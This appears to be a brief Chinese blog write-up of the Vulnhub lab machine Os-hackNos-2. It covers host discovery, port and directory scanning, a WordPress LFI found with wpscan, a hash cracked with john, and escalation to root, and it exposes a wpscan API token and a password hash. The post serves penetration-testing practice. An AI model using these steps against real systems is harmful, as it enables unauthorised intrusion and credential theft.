前言
- Vulnhub刷题简单记录
Os-hackNos-2开始
1、可以用两种方法确认靶场的存在,扫ip
1 |
netdiscover -i eth0 -r 192.168.56.0/24 |
2、扫目标端口开发情况
1 |
nmap -p- -T5 -A 192.168.56.107 -oA dom |
3、访问主页,爆破目录,接着发现他wp的框架
1 |
gobuster dir -u http://192.168.56.107 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 |
4、接着用wpscan扫出LFI漏洞
1 |
wpscan --url http://192.168.56.107/tsweb/ -e vp --api-token uRtscTsMbaEcsD0aaBjMdWOeFskt4NgsOnmOv1gHKI0 |
获得flag用户的密码密文,准备破解用john
1 |
$1$flag$vqjCxzjtRc7PofLYS2lWf/ |
接着就登录了topsecret
5、接着在网站目录中找到备份文件中有一个rohit用户的md5hash值
1 |
用john破解 |
接着用拿到root权限
1 |
sudo su root |
我的个人博客
孤桜懶契:http://gylq.gitee.io
FROM:gylq.gitee Author:孤桜懶契
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论